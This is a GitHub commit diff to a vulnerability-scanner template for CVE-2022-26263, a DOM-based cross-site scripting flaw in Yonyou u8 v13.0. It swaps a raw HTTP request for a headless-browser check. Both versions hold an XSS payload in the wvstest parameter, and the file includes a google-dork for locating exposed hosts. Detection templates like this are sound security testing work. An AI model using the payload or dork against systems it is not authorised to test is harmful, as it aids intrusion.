Update CVE-2022-26263.yaml

patch-1
Ritik Chaddha 2022-10-12 21:59:35 +05:30 committed by GitHub
parent fb1ba83213
commit 51d0a049e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 22 deletions

View File

@ -2,7 +2,7 @@ id: CVE-2022-26263
info:
name: Yonyou u8 v13.0 - Cross Site Scripting
author: edoardottt
author: edoardottt,theamanrawat
severity: medium
description: |
Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
@ -12,30 +12,18 @@ info:
classification:
cve-id: CVE-2022-26263
metadata:
verified: true
google-dork: inurl:/u8sl/WebHelp
tags: cve,cve2022,xss,yonyou
tags: cve,cve2022,yonyou,xss
requests:
- raw:
- |
@timeout: 10s
GET /U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"'"><xsstag>()locxss")#javascript:alert(document.domain) HTTP/1.1
Host: {{Hostname}}
headless:
- steps:
- args:
url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27"><xsstag>()locxss")#javascript:console.log(document.domain)'
action: navigate
- action: waitload
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<FRAME SRC='Welcome.htm' name='bsscright' scrolling='yes'>"
- "<META NAME=\"generator\" CONTENT=\"RoboHELP by eHelp Corporation www.ehelp.com\">"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
- '<frame src="javascript:console.log(document.domain)"'